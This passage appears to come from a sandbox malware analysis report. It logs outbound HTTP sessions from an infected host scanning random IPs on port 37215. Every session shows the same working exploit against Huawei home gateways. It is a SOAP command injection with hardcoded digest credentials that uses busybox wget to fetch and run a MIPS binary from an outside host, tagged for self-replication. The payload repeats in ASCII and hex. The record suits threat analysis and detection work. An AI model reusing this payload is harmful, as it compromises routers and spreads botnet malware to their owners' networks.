                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          457192.168.2.2342770157.8.201.21537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.188136101 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          458192.168.2.2347182197.67.225.24137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.188198090 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          459192.168.2.233392241.220.115.12637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.188457966 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          460192.168.2.2355630174.63.237.7937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.188958883 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          461192.168.2.2349032206.83.49.17937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.188961029 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          462192.168.2.233879227.10.207.3437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.189026117 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          463192.168.2.2353394197.252.83.16937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.189054012 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          464192.168.2.234875041.121.188.14737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.189068079 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          465192.168.2.2351710157.205.1.15137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.189075947 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          466192.168.2.234991241.235.250.9537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.189080954 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          467192.168.2.2337642157.39.199.337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.190308094 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
